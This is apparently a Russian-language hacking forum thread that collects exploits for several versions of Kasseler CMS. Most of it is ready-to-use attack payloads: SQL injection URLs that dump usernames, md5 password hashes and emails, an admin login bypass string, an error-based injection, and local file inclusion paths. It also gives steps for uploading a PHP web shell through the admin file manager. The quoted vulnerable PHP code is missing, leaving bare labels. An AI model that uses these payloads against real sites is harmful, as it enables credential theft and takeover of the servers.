![]() |
Kasseler CMS 1.1.0, 1.2.0 Lite SQL Injection
Офф.сайт: www.kasseler-cms.net
Префикс таблиц бд: kasseler_ Default hash: md5($pass) Админка: http://localhost/admin.php От автора: Цитата:
[SQL inj в модуле новостей News] Сценарий /modules/News/index.php уязвимый код: PHP код:
Условие: magic_quotes_gpc = Off Эксплойт: Код:
http://localhost/[installdir]/index.php?module=News&do=View&nid=1'+and+1=2+union+select+1,2,concat_ws(0x3a,user_name,user_password,user_email),4,user(),version(),7,8,9,10,11,12,database(),14,15,16,17,18+from+kasseler_users+where+uid=1/*[SQL inj в модуле опросов Voting] Сценарий /modules/Voting/index.php уязвимый код: PHP код:
Условие: magic_quotes_gpc = Off Эксплойт: Код:
http://localhost/[installdir]/index.php?module=Voting&do=Result&vid=1'+union+select+1,concat_ws(0x3a,user_name,user_password,user_email),3,4,user(),6,version(),8,9,10,11,12,13,14,15+from+kasseler_users+where+uid=1/*[SQL inj в модуле форума на сайте Forum] Сценарий /modules/Forum/index.php уязвимый код: PHP код:
Эксплойт: Код:
http://localhost/[installdir]/index.php?module=Forum&do=ShowForum&fid=1'+union+select+1,2,3,concat_ws(0x3a,user_name,user_password,user_email),5,user(),database(),8,9,10,11,version(),13,14,15+from+kasseler_users+where+uid=1/*Код:
http://localhost/[installdir]/index.php?module=Forum&do=ShowTopic&tid=706'+union+select+1,2,3,4,concat_ws(0x3a,user_name,user_password,user_email),6,7,user(),9,10,11,version(),13,14,15,16,17,18+from+kasseler_users+where+uid=1/*[SQL inj в модуле профиля пользователя Account] Сценарий /modules/Account/index.php уязвимый код: PHP код:
Эксплойт: Код:
http://localhost/[installdir]/index.php?module=Account&do=UserInfo&uname=dok'+union+select+1,2,3,4,concat_ws(0x3a,user_name,user_password,user_email),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+kasseler_users+where+uid=1/*Условие: magic_quotes_gpc = Off уязвимый код: PHP код:
Код:
http://localhost/[installdir]/index.php?module=1'+and+1=2+union+select+1,concat_ws(0x3a,user_name,user_password,user_email),3,4,5+from+kasseler_users+where+uid=1/*Заходим в админку (http://localhost/admin.php)-> Файловый менеджер -> Каталог: uploads/avatars/ -> загрузка файлов shell.php. Шелл будет тут: http://localhost/uploads/avatars/shell.php Поиск: Web site engine code is Copyright ©2007-2008 by Kasseler CMS. All rights reserved. http://milw0rm.com/exploits/6460 (c) ~!Dok_tOR!~ |
name: kasseler cms 1.3.x lite
download: http://www.kasseler-cms.net/files/more/kasseler_cms_1.3.x_lite.html 1) LFI (требования: mq=off) file: admin.php PHP код:
Код:
/admin.php?do=LogIn&adm=../[file]%00file: /modules/account/pm.php PHP код:
Регаем акк. Отправляем сами себе ПМ. Заходим в /index.php?module=Forum&do=Outbox . (для дальнейшей работы потребуется temper date) Выделяем свое сообщение,включаем перехват и жмякаем Отправить. Далее изменяем значение переменной selected на свой sql запрос. Если запрос выполнится,то сообщение перенесётся в Сохраненные. Геморно,конечно,но работает.. //много файлов,не все еще посмотрел.. //скули с поста доктора прикрыли |
SQL Inject Kasseler 2.0.5
Продукт: Kasseler CMS
Версия: 2.0.5 lite SQL-Injection Условия: magic_quotes = Off Модуль Авторизации \admin.php Недостаточна фильтрация $_POST['login'], таким образом можно подменить результаты запроса и получить админские куки В поле логин "login' union select 'login','d56b699830e77ba53855679cb1d252da',2 /*" В поле пароль "login" Уязвимый участок кода в \administrator\login.php PHP код:
|
Продолжение...
Продукт: Kasseler CMS Версия: 2.0.5 lite Недостаток в том что файл admin.php надо искать! В рекомендациях по установке указано что Цитата:
Также есть SQL inj в модуле: Account – Модуль профиль пользователя в части представления который всегда доступен! Условие: mg=off линк: Код:
http://site/index.php?module=account&do=loginАлгоритм хеша - md5 и никакой соли! PHP код:
Duplicate column name 'admin:21232f297a57a5a743894a0e4a801fc3' поле логин: ' or (1,2)=(select * from(select name_const((select concat_ws(':',user_name,user_password) from kasseler_users limit 1,1),1),name_const((select concat_ws(':',user_name,user_password) from kasseler_users limit 1,1),1))x)/* пасс: любой По умолчанию 2 запись в таблице это запись админа,1- гостя, далее в зависимости какими правами наделен пользователь! Посмотреть версию (для текущей!): http://site/index.php?system=version LFI includes/function/init.php PHP код:
PHP код:
PHP код:
http://kasseler/index.php?blockfile=[LFI] Example: http://kasseler/index.php?blockfile=..\robots.txt Условие: OS WIN , "\" Пути, они есть и у других файлах: передаем куками: lang= them= на вторую переменную код не привожу! include/function/init.php PHP код:
PHP код:
Цитата:
|
| Время: 05:01 |